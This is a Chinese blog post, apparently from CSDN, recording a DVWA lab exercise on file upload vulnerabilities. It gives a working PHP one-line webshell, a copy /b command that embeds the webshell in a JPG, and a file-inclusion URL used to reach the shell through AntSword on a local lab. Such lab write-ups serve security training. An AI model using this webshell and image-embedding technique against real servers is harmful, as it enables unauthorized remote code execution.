DVWA练习记录--文件上传漏洞

DVWA练习记录–文件上传漏洞

1.在记事本中写一句话木马并将其重命名为webshell.php

<?php @eval($_POST['pass']);?>
在这里插入图片描述
在这里插入图片描述

2.随便找一张jpg或者png格式的图片,放到与webshell.php同一目录下,在该目录打开cmd命令窗口,执行命令:

copy /b 桃花.jpg+webshell.php 1.jpg

在这里插入图片描述

注意这里加号前后的顺序不能变,一定是先图片后php,生成1.jpg上传

在这里插入图片描述
上传成功。
在这里插入图片描述
3.蚁剑添加数据,URL地址为上传文件成功得到的地址,密码是一句话木马中[’ ']里的内容。
在这里插入图片描述
测试连接发现失败。
在这里插入图片描述4.这个时候考虑搭配文件包含漏洞组合攻击,

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file:///D:phpStudy/PHPTutorial/WWW/DVWA/hackable/uploads/1.jpg

利用该网址
在这里插入图片描述

发现有乱码,说明成功,蚁剑连接这里需要配置请求信息cookies

在这里插入图片描述

连接成功

附:参考视频

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值